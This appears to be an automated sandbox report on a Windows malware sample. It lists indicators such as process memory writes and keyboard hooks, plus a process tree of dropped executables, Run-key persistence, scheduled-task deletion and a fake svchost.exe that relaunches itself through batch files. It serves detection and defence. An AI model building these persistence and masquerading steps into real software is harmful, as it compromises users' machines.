pid Process 19336 dwm.exe 19336 dwm.exe 19336 dwm.exe 19336 dwm.exe 19336 dwm.exe 19336 dwm.exe 19336 dwm.exe 19336 dwm.exe 19336 dwm.exe 19336 dwm.exe 19336 dwm.exe 19336 dwm.exe 19336 dwm.exe 19336 dwm.exe 19336 dwm.exe 19336 dwm.exe 19336 dwm.exe 19336 dwm.exe 19336 dwm.exe 19336 dwm.exe 19336 dwm.exe 19336 dwm.exe 19336 dwm.exe 19336 dwm.exe 19336 dwm.exe 19336 dwm.exe 19336 dwm.exe 19336 dwm.exe 19336 dwm.exe 19336 dwm.exe 19336 dwm.exe 19336 dwm.exe 19336 dwm.exe 19336 dwm.exe 19336 dwm.exe 19336 dwm.exe 19336 dwm.exe 19336 dwm.exe 19336 dwm.exe 19336 dwm.exe 19336 dwm.exe 19336 dwm.exe 19336 dwm.exe 19336 dwm.exe 19336 dwm.exe 19336 dwm.exe 19336 dwm.exe 19336 dwm.exe 19336 dwm.exe 19336 dwm.exe 19336 dwm.exe 19336 dwm.exe 19336 dwm.exe 19336 dwm.exe 19336 dwm.exe 19336 dwm.exe 19336 dwm.exe 19336 dwm.exe 19336 dwm.exe 19336 dwm.exe 19336 dwm.exe 19336 dwm.exe 19336 dwm.exe 19336 dwm.exe -
Suspicious use of SetWindowsHookEx 14 IoCs
pid Process 19424 svchost.exe 19740 svchost.exe 20024 svchost.exe 21660 svchost.exe 5132 svchost.exe 5428 svchost.exe 5708 svchost.exe 6404 svchost.exe 24140 XClient.exe 11096 svchost.exe 27148 svchost.exe 11892 svchost.exe 12040 PCclear_Eng_mini.exe 12040 PCclear_Eng_mini.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 5008 wrote to memory of 4068 5008 2fcad226b17131da4274e1b9f8f31359bdd325c9568665f08fd1f6c5d06a23ce.exe 87 PID 5008 wrote to memory of 4068 5008 2fcad226b17131da4274e1b9f8f31359bdd325c9568665f08fd1f6c5d06a23ce.exe 87 PID 5008 wrote to memory of 4068 5008 2fcad226b17131da4274e1b9f8f31359bdd325c9568665f08fd1f6c5d06a23ce.exe 87 PID 5008 wrote to memory of 4424 5008 2fcad226b17131da4274e1b9f8f31359bdd325c9568665f08fd1f6c5d06a23ce.exe 89 PID 5008 wrote to memory of 4424 5008 2fcad226b17131da4274e1b9f8f31359bdd325c9568665f08fd1f6c5d06a23ce.exe 89 PID 5008 wrote to memory of 2356 5008 2fcad226b17131da4274e1b9f8f31359bdd325c9568665f08fd1f6c5d06a23ce.exe 90 PID 5008 wrote to memory of 2356 5008 2fcad226b17131da4274e1b9f8f31359bdd325c9568665f08fd1f6c5d06a23ce.exe 90 PID 5008 wrote to memory of 2356 5008 2fcad226b17131da4274e1b9f8f31359bdd325c9568665f08fd1f6c5d06a23ce.exe 90 PID 4424 wrote to memory of 4884 4424 Office.exe 93 PID 4424 wrote to memory of 4884 4424 Office.exe 93 PID 5008 wrote to memory of 4920 5008 2fcad226b17131da4274e1b9f8f31359bdd325c9568665f08fd1f6c5d06a23ce.exe 94 PID 5008 wrote to memory of 4920 5008 2fcad226b17131da4274e1b9f8f31359bdd325c9568665f08fd1f6c5d06a23ce.exe 94 PID 5008 wrote to memory of 4920 5008 2fcad226b17131da4274e1b9f8f31359bdd325c9568665f08fd1f6c5d06a23ce.exe 94 PID 2356 wrote to memory of 3240 2356 pi.exe 97 PID 2356 wrote to memory of 3240 2356 pi.exe 97 PID 2356 wrote to memory of 3240 2356 pi.exe 97 PID 4884 wrote to memory of 2792 4884 svchost.exe 98 PID 4884 wrote to memory of 2792 4884 svchost.exe 98 PID 2792 wrote to memory of 3796 2792 cmd.exe 100 PID 2792 wrote to memory of 3796 2792 cmd.exe 100 PID 2792 wrote to memory of 4048 2792 cmd.exe 101 PID 2792 wrote to memory of 4048 2792 cmd.exe 101 PID 4920 wrote to memory of 5096 4920 s.exe 102 PID 4920 wrote to memory of 5096 4920 s.exe 102 PID 4920 wrote to memory of 5096 4920 s.exe 102 PID 4068 wrote to memory of 3732 4068 npp.exe 103 PID 4068 wrote to memory of 3732 4068 npp.exe 103 PID 4068 wrote to memory of 3732 4068 npp.exe 103 PID 3240 wrote to memory of 820 3240 sysppvrdnvs.exe 105 PID 3240 wrote to memory of 820 3240 sysppvrdnvs.exe 105 PID 3240 wrote to memory of 820 3240 sysppvrdnvs.exe 105 PID 3240 wrote to memory of 2216 3240 sysppvrdnvs.exe 107 PID 3240 wrote to memory of 2216 3240 sysppvrdnvs.exe 107 PID 3240 wrote to memory of 2216 3240 sysppvrdnvs.exe 107 PID 820 wrote to memory of 4420 820 cmd.exe 109 PID 820 wrote to memory of 4420 820 cmd.exe 109 PID 820 wrote to memory of 4420 820 cmd.exe 109 PID 2216 wrote to memory of 4400 2216 cmd.exe 110 PID 2216 wrote to memory of 4400 2216 cmd.exe 110 PID 2216 wrote to memory of 4400 2216 cmd.exe 110 PID 2216 wrote to memory of 2992 2216 cmd.exe 111 PID 2216 wrote to memory of 2992 2216 cmd.exe 111 PID 2216 wrote to memory of 2992 2216 cmd.exe 111 PID 2216 wrote to memory of 4372 2216 cmd.exe 112 PID 2216 wrote to memory of 4372 2216 cmd.exe 112 PID 2216 wrote to memory of 4372 2216 cmd.exe 112 PID 2216 wrote to memory of 3320 2216 cmd.exe 113 PID 2216 wrote to memory of 3320 2216 cmd.exe 113 PID 2216 wrote to memory of 3320 2216 cmd.exe 113 PID 2216 wrote to memory of 4020 2216 cmd.exe 114 PID 2216 wrote to memory of 4020 2216 cmd.exe 114 PID 2216 wrote to memory of 4020 2216 cmd.exe 114 PID 5096 wrote to memory of 4824 5096 sysvplervcs.exe 115 PID 5096 wrote to memory of 4824 5096 sysvplervcs.exe 115 PID 5096 wrote to memory of 4824 5096 sysvplervcs.exe 115 PID 5096 wrote to memory of 2084 5096 sysvplervcs.exe 117 PID 5096 wrote to memory of 2084 5096 sysvplervcs.exe 117 PID 5096 wrote to memory of 2084 5096 sysvplervcs.exe 117 PID 4824 wrote to memory of 1492 4824 cmd.exe 119 PID 4824 wrote to memory of 1492 4824 cmd.exe 119 PID 4824 wrote to memory of 1492 4824 cmd.exe 119 PID 2084 wrote to memory of 2272 2084 cmd.exe 120 PID 2084 wrote to memory of 2272 2084 cmd.exe 120 PID 2084 wrote to memory of 2272 2084 cmd.exe 120 -
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
Processes
-
C:\Windows\Explorer.EXEC:\Windows\Explorer.EXE1⤵PID:3532
-
C:\Users\Admin\AppData\Local\Temp\2fcad226b17131da4274e1b9f8f31359bdd325c9568665f08fd1f6c5d06a23ce.exe"C:\Users\Admin\AppData\Local\Temp\2fcad226b17131da4274e1b9f8f31359bdd325c9568665f08fd1f6c5d06a23ce.exe"2⤵
- Checks computer location settings
- System Location Discovery: System Language Discovery
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:5008 -
C:\Users\Admin\AppData\Local\Temp\Files\npp.exe"C:\Users\Admin\AppData\Local\Temp\Files\npp.exe"3⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:4068 -
C:\Users\Admin\AppData\Local\Temp\1548427715.exeC:\Users\Admin\AppData\Local\Temp\1548427715.exe4⤵
- Executes dropped EXE
- Adds Run key to start application
- Drops file in Windows directory
- System Location Discovery: System Language Discovery
PID:3732 -
C:\Windows\sysnldcvmr.exeC:\Windows\sysnldcvmr.exe5⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious behavior: SetClipboardViewer
PID:2940 -
C:\Users\Admin\AppData\Local\Temp\531210104.exeC:\Users\Admin\AppData\Local\Temp\531210104.exe6⤵
- Checks computer location settings
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:17016 -
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg delete "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "Windows Upgrade Manager" /f7⤵PID:17096
-
C:\Windows\system32\reg.exereg delete "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "Windows Upgrade Manager" /f8⤵PID:17188
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c schtasks /delete /f /tn "Windows Upgrade Manager"7⤵PID:17120
-
C:\Windows\system32\schtasks.exeschtasks /delete /f /tn "Windows Upgrade Manager"8⤵PID:17212
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\1142231072.exeC:\Users\Admin\AppData\Local\Temp\1142231072.exe6⤵
- Executes dropped EXE
PID:17480
-
-
C:\Users\Admin\AppData\Local\Temp\1475019939.exeC:\Users\Admin\AppData\Local\Temp\1475019939.exe6⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:18156 -
C:\Users\Admin\AppData\Local\Temp\3402010102.exeC:\Users\Admin\AppData\Local\Temp\3402010102.exe7⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
PID:18296
-
-
-
C:\Users\Admin\AppData\Local\Temp\14548093.exeC:\Users\Admin\AppData\Local\Temp\14548093.exe6⤵
- Executes dropped EXE
PID:18356
-
-
C:\Users\Admin\AppData\Local\Temp\1483322851.exeC:\Users\Admin\AppData\Local\Temp\1483322851.exe6⤵
- Executes dropped EXE
- Adds Run key to start application
- Drops file in Windows directory
- System Location Discovery: System Language Discovery
PID:22688 -
C:\Users\Admin\sysnldcvmr.exeC:\Users\Admin\sysnldcvmr.exe7⤵
- Executes dropped EXE
PID:22888 -
C:\Users\Admin\AppData\Local\Temp\52263531.exeC:\Users\Admin\AppData\Local\Temp\52263531.exe8⤵
- Checks computer location settings
- Suspicious behavior: EnumeratesProcesses
PID:6052 -
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg delete "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "Windows Upgrade Manager" /f9⤵PID:3316
-
C:\Windows\system32\reg.exereg delete "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "Windows Upgrade Manager" /f10⤵PID:968
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c schtasks /delete /f /tn "Windows Upgrade Manager"9⤵PID:640
-
C:\Windows\system32\schtasks.exeschtasks /delete /f /tn "Windows Upgrade Manager"10⤵PID:2836
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\2760524604.exeC:\Users\Admin\AppData\Local\Temp\2760524604.exe8⤵
- System Location Discovery: System Language Discovery
PID:24460
-
-
C:\Users\Admin\AppData\Local\Temp\1740414134.exeC:\Users\Admin\AppData\Local\Temp\1740414134.exe8⤵
- System Location Discovery: System Language Discovery
PID:10044
-
-
C:\Users\Admin\AppData\Local\Temp\14942337.exeC:\Users\Admin\AppData\Local\Temp\14942337.exe8⤵PID:6904
-
-
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\Files\Office.exe"C:\Users\Admin\AppData\Local\Temp\Files\Office.exe"3⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:4424 -
C:\Users\Admin\AppData\Roaming\Office\svchost.exe"C:\Users\Admin\AppData\Roaming\Office\svchost.exe"4⤵
- Checks computer location settings
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:4884 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\6qOyk5FaZVEF.bat" "5⤵
- Suspicious use of WriteProcessMemory
PID:2792 -
C:\Windows\system32\chcp.comchcp 650016⤵PID:3796
-
-
C:\Windows\system32\PING.EXEping -n 10 localhost6⤵
- System Network Configuration Discovery: Internet Connection Discovery
- Runs ping.exe
PID:4048
-
-
C:\Users\Admin\AppData\Roaming\Office\svchost.exe"C:\Users\Admin\AppData\Roaming\Office\svchost.exe"6⤵
- Checks computer location settings
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:4036 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\cqxBuGrKdTzY.bat" "7⤵PID:768
-
C:\Windows\system32\chcp.comchcp 650018⤵PID:4616
-
-
C:\Windows\system32\PING.EXEping -n 10 localhost8⤵
- System Network Configuration Discovery: Internet Connection Discovery
- Runs ping.exe
PID:1656
-
-
C:\Users\Admin\AppData\Roaming\Office\svchost.exe"C:\Users\Admin\AppData\Roaming\Office\svchost.exe"8⤵
- Checks computer location settings
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:3432 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\KhVJbOVXz7HX.bat" "9⤵PID:1636
-
C:\Windows\system32\chcp.comchcp 6500110⤵PID:3572
-
-
C:\Windows\system32\PING.EXEping -n 10 localhost10⤵
- System Network Configuration Discovery: Internet Connection Discovery
- Runs ping.exe
PID:2632
-
-
C:\Users\Admin\AppData\Roaming\Office\svchost.exe"C:\Users\Admin\AppData\Roaming\Office\svchost.exe"10⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:8672 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\HPvJ3GwkxGYu.bat" "11⤵PID:8744
-
C:\Windows\system32\chcp.comchcp 6500112⤵PID:8804
-
-
C:\Windows\system32\PING.EXEping -n 10 localhost12⤵
- System Network Configuration Discovery: Internet Connection Discovery
- Runs ping.exe
PID:8820
-
-
C:\Users\Admin\AppData\Roaming\Office\svchost.exe"C:\Users\Admin\AppData\Roaming\Office\svchost.exe"12⤵
- Checks computer location settings
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:9124 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\w3jBNJBhWU6y.bat" "13⤵PID:4828
-
C:\Windows\system32\chcp.comchcp 6500114⤵PID:15460
-
-
C:\Windows\system32\PING.EXEping -n 10 localhost14⤵
- System Network Configuration Discovery: Internet Connection Discovery
- Runs ping.exe
PID:15476
-
-
C:\Users\Admin\AppData\Roaming\Office\svchost.exe"C:\Users\Admin\AppData\Roaming\Office\svchost.exe"14⤵
- Checks computer location settings
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:15892 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\6kOZ0nYEwOqZ.bat" "15⤵PID:15988
-
C:\Windows\system32\chcp.comchcp 6500116⤵PID:16036
-
-
C:\Windows\system32\PING.EXEping -n 10 localhost16⤵
- System Network Configuration Discovery: Internet Connection Discovery
- Runs ping.exe
PID:16052
-
-
C:\Users\Admin\AppData\Roaming\Office\svchost.exe"C:\Users\Admin\AppData\Roaming\Office\svchost.exe"16⤵
- Checks computer location settings
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:16172 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\b6unfxglwNos.bat" "17⤵PID:16244
-
C:\Windows\system32\chcp.comchcp 6500118⤵PID:16308
-
-
C:\Windows\system32\PING.EXEping -n 10 localhost18⤵
- System Network Configuration Discovery: Internet Connection Discovery
- Runs ping.exe
PID:16324
-
-
C:\Users\Admin\AppData\Roaming\Office\svchost.exe"C:\Users\Admin\AppData\Roaming\Office\svchost.exe"18⤵
- Checks computer location settings
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:16424 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\CIv9c7sz7QZ6.bat" "19⤵PID:16500
-
C:\Windows\system32\chcp.comchcp 6500120⤵PID:16536
-
-
C:\Windows\system32\PING.EXEping -n 10 localhost20⤵
- System Network Configuration Discovery: Internet Connection Discovery
- Runs ping.exe
PID:16620
-
-
C:\Users\Admin\AppData\Roaming\Office\svchost.exe"C:\Users\Admin\AppData\Roaming\Office\svchost.exe"20⤵
- Checks computer location settings
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:16712 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\46MePfshTGBI.bat" "21⤵PID:16800
-
C:\Windows\system32\chcp.comchcp 6500122⤵PID:16848
-
-
C:\Windows\system32\PING.EXEping -n 10 localhost22⤵
- System Network Configuration Discovery: Internet Connection Discovery
- Runs ping.exe
PID:16864
-
-
C:\Users\Admin\AppData\Roaming\Office\svchost.exe"C:\Users\Admin\AppData\Roaming\Office\svchost.exe"22⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:17004 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\f4idl1RRLJ7C.bat" "23⤵PID:17284
-
C:\Windows\system32\chcp.comchcp 6500124⤵PID:17328
-
-
C:\Windows\system32\PING.EXEping -n 10 localhost24⤵
- System Network Configuration Discovery: Internet Connection Discovery
- Runs ping.exe
PID:17344
-
-
C:\Users\Admin\AppData\Roaming\Office\svchost.exe"C:\Users\Admin\AppData\Roaming\Office\svchost.exe"24⤵
- Checks computer location settings
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:17776 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\tUE7hG63uiOP.bat" "25⤵PID:17928
-
C:\Windows\system32\chcp.comchcp 6500126⤵PID:17992
-
-
C:\Windows\system32\PING.EXEping -n 10 localhost26⤵
- System Network Configuration Discovery: Internet Connection Discovery
- Runs ping.exe
PID:18080
-
-
C:\Users\Admin\AppData\Roaming\Office\svchost.exe"C:\Users\Admin\AppData\Roaming\Office\svchost.exe"26⤵
- Checks computer location settings
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:18412 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\G4GfFF0Aj4e2.bat" "27⤵PID:18560
-
C:\Windows\system32\chcp.comchcp 6500128⤵PID:18608
-
-
C:\Windows\system32\PING.EXEping -n 10 localhost28⤵
- System Network Configuration Discovery: Internet Connection Discovery
- Runs ping.exe
PID:18624
-
-
C:\Users\Admin\AppData\Roaming\Office\svchost.exe"C:\Users\Admin\AppData\Roaming\Office\svchost.exe"28⤵
- Checks computer location settings
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
PID:19424 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\Zy5zPy5K639Q.bat" "29⤵PID:19544
-
C:\Windows\system32\chcp.comchcp 6500130⤵PID:19600
-
-
C:\Windows\system32\PING.EXEping -n 10 localhost30⤵
- System Network Configuration Discovery: Internet Connection Discovery
- Runs ping.exe
PID:19612
-
-
C:\Users\Admin\AppData\Roaming\Office\svchost.exe"C:\Users\Admin\AppData\Roaming\Office\svchost.exe"30⤵
- Checks computer location settings
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
PID:19740 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\RE2vUVaVmeGA.bat" "31⤵PID:19824
-
C:\Windows\system32\chcp.comchcp 6500132⤵PID:19876
-
-
C:\Windows\system32\PING.EXEping -n 10 localhost32⤵
- System Network Configuration Discovery: Internet Connection Discovery
- Runs ping.exe
PID:19896
-
-
C:\Users\Admin\AppData\Roaming\Office\svchost.exe"C:\Users\Admin\AppData\Roaming\Office\svchost.exe"32⤵
- Checks computer location settings
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
PID:20024 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\TF6BeE3aJufX.bat" "33⤵PID:20120
-
C:\Windows\system32\chcp.comchcp 6500134⤵PID:20164
-
-
C:\Windows\system32\PING.EXEping -n 10 localhost34⤵
- System Network Configuration Discovery: Internet Connection Discovery
- Runs ping.exe
PID:20176
-
-
C:\Users\Admin\AppData\Roaming\Office\svchost.exe"C:\Users\Admin\AppData\Roaming\Office\svchost.exe"34⤵
- Checks computer location settings
- Executes dropped EXE
PID:20296 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\3kfTva41YNOX.bat" "35⤵PID:20376
-
C:\Windows\system32\chcp.comchcp 6500136⤵PID:20424
-
-
C:\Windows\system32\PING.EXEping -n 10 localhost36⤵
- System Network Configuration Discovery: Internet Connection Discovery
- Runs ping.exe
PID:20440
-
-
C:\Users\Admin\AppData\Roaming\Office\svchost.exe"C:\Users\Admin\AppData\Roaming\Office\svchost.exe"36⤵
- Checks computer location settings
- Executes dropped EXE
PID:20612 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\Uee5u6ruNj3X.bat" "37⤵PID:20692
-
C:\Windows\system32\chcp.comchcp 6500138⤵PID:20736
-
-
C:\Windows\system32\PING.EXEping -n 10 localhost38⤵
- System Network Configuration Discovery: Internet Connection Discovery
- Runs ping.exe
PID:20752
-
-
C:\Users\Admin\AppData\Roaming\Office\svchost.exe"C:\Users\Admin\AppData\Roaming\Office\svchost.exe"38⤵
- Checks computer location settings
- Executes dropped EXE
PID:20868 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\HLUBAY9y353o.bat" "39⤵PID:20952
-
C:\Windows\system32\chcp.comchcp 6500140⤵PID:20996
-
-
C:\Windows\system32\PING.EXEping -n 10 localhost40⤵
- System Network Configuration Discovery: Internet Connection Discovery
- Runs ping.exe
PID:21012
-
-
C:\Users\Admin\AppData\Roaming\Office\svchost.exe"C:\Users\Admin\AppData\Roaming\Office\svchost.exe"40⤵
- Checks computer location settings
- Executes dropped EXE
PID:21124 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\kRZeowg2iOm9.bat" "41⤵PID:21228
-
C:\Windows\system32\chcp.comchcp 6500142⤵PID:21276
-
-
C:\Windows\system32\PING.EXEping -n 10 localhost42⤵
- System Network Configuration Discovery: Internet Connection Discovery
- Runs ping.exe
PID:21292
-
-
C:\Users\Admin\AppData\Roaming\Office\svchost.exe"C:\Users\Admin\AppData\Roaming\Office\svchost.exe"42⤵
- Executes dropped EXE
PID:21392 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\VigsnQza1r3a.bat" "43⤵PID:21476
-
C:\Windows\system32\chcp.comchcp 6500144⤵PID:21524
-
-
C:\Windows\system32\PING.EXEping -n 10 localhost44⤵
- System Network Configuration Discovery: Internet Connection Discovery
- Runs ping.exe
PID:21540
-
-
C:\Users\Admin\AppData\Roaming\Office\svchost.exe"C:\Users\Admin\AppData\Roaming\Office\svchost.exe"44⤵
- Checks computer location settings
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
PID:21660 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\44d7af45Wsbt.bat" "45⤵PID:21752
-
C:\Windows\system32\chcp.comchcp 6500146⤵PID:21796
-
-
C:\Windows\system32\PING.EXEping -n 10 localhost46⤵
- System Network Configuration Discovery: Internet Connection Discovery
- Runs ping.exe
PID:21808
-
-
C:\Users\Admin\AppData\Roaming\Office\svchost.exe"C:\Users\Admin\AppData\Roaming\Office\svchost.exe"46⤵
- Checks computer location settings
- Executes dropped EXE
PID:21924 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\rZmhOmIrswFh.bat" "47⤵PID:22020
-
C:\Windows\system32\chcp.comchcp 6500148⤵PID:22280
-
-
C:\Windows\system32\PING.EXEping -n 10 localhost48⤵
- System Network Configuration Discovery: Internet Connection Discovery
- Runs ping.exe
PID:22296
-
-
C:\Users\Admin\AppData\Roaming\Office\svchost.exe"C:\Users\Admin\AppData\Roaming\Office\svchost.exe"48⤵
- Checks computer location settings
- Executes dropped EXE
PID:22428 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\NXw0UWxuZWwx.bat" "49⤵PID:22516
-
C:\Windows\system32\chcp.comchcp 6500150⤵PID:4188
-
-
C:\Windows\system32\PING.EXEping -n 10 localhost50⤵
- System Network Configuration Discovery: Internet Connection Discovery
- Runs ping.exe
PID:2556
-
-
C:\Users\Admin\AppData\Roaming\Office\svchost.exe"C:\Users\Admin\AppData\Roaming\Office\svchost.exe"50⤵
- Checks computer location settings
- Executes dropped EXE
PID:540 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\p8mcOzBHTSEy.bat" "51⤵PID:4588
-
C:\Windows\system32\chcp.comchcp 6500152⤵PID:3504
-
-
C:\Windows\system32\PING.EXEping -n 10 localhost52⤵
- System Network Configuration Discovery: Internet Connection Discovery
- Runs ping.exe
PID:4276
-
-
C:\Users\Admin\AppData\Roaming\Office\svchost.exe"C:\Users\Admin\AppData\Roaming\Office\svchost.exe"52⤵
- Checks computer location settings
- Executes dropped EXE
PID:1440 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\ZkVvyAyhMr4i.bat" "53⤵PID:1388
-
C:\Windows\system32\chcp.comchcp 6500154⤵PID:5108
-
-
C:\Windows\system32\PING.EXEping -n 10 localhost54⤵
- System Network Configuration Discovery: Internet Connection Discovery
- Runs ping.exe
PID:1128
-
-
C:\Users\Admin\AppData\Roaming\Office\svchost.exe"C:\Users\Admin\AppData\Roaming\Office\svchost.exe"54⤵
- Checks computer location settings
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
PID:5132 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\9i2E0HxLcYxR.bat" "55⤵PID:5212
-
C:\Windows\system32\chcp.comchcp 6500156⤵PID:5260
-
-
C:\Windows\system32\PING.EXEping -n 10 localhost56⤵
- System Network Configuration Discovery: Internet Connection Discovery
- Runs ping.exe
PID:5276
-
-
C:\Users\Admin\AppData\Roaming\Office\svchost.exe"C:\Users\Admin\AppData\Roaming\Office\svchost.exe"56⤵
- Checks computer location settings
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
PID:5428 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\Fn8Ux7feUcuM.bat" "57⤵PID:5516
-
C:\Windows\system32\chcp.comchcp 6500158⤵PID:5568
-
-
C:\Windows\system32\PING.EXEping -n 10 localhost58⤵
- System Network Configuration Discovery: Internet Connection Discovery
- Runs ping.exe
PID:5584
-
-
C:\Users\Admin\AppData\Roaming\Office\svchost.exe"C:\Users\Admin\AppData\Roaming\Office\svchost.exe"58⤵
- Checks computer location settings
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
PID:5708 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\dBm6HzzVqG3R.bat" "59⤵PID:5792
-
C:\Windows\system32\chcp.comchcp 6500160⤵PID:5836
-
-
C:\Windows\system32\PING.EXEping -n 10 localhost60⤵
- System Network Configuration Discovery: Internet Connection Discovery
- Runs ping.exe
PID:22080
-
-
C:\Users\Admin\AppData\Roaming\Office\svchost.exe"C:\Users\Admin\AppData\Roaming\Office\svchost.exe"60⤵
- Checks computer location settings
- Executes dropped EXE
PID:22184 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\1L3F27gTzNC6.bat" "61⤵PID:22260
-
C:\Windows\system32\chcp.comchcp 6500162⤵PID:5884
-
-
C:\Windows\system32\PING.EXEping -n 10 localhost62⤵
- System Network Configuration Discovery: Internet Connection Discovery
- Runs ping.exe
PID:5900
-
-
C:\Users\Admin\AppData\Roaming\Office\svchost.exe"C:\Users\Admin\AppData\Roaming\Office\svchost.exe"62⤵
- Checks computer location settings
- Executes dropped EXE
PID:22716 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\1y8f52ey6ZGH.bat" "63⤵PID:22788
-
C:\Windows\system32\chcp.comchcp 6500164⤵PID:22836
-
-
C:\Windows\system32\PING.EXEping -n 10 localhost64⤵
- System Network Configuration Discovery: Internet Connection Discovery
- Runs ping.exe
PID:22852
-
-
C:\Users\Admin\AppData\Roaming\Office\svchost.exe"C:\Users\Admin\AppData\Roaming\Office\svchost.exe"64⤵
- Checks computer location settings
- Executes dropped EXE
PID:23172 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\P4nLSZGM4KxM.bat" "65⤵PID:23260
-
C:\Windows\system32\chcp.comchcp 6500166⤵PID:23304
-
-
C:\Windows\system32\PING.EXEping -n 10 localhost66⤵
- System Network Configuration Discovery: Internet Connection Discovery
- Runs ping.exe
PID:23320
-
-
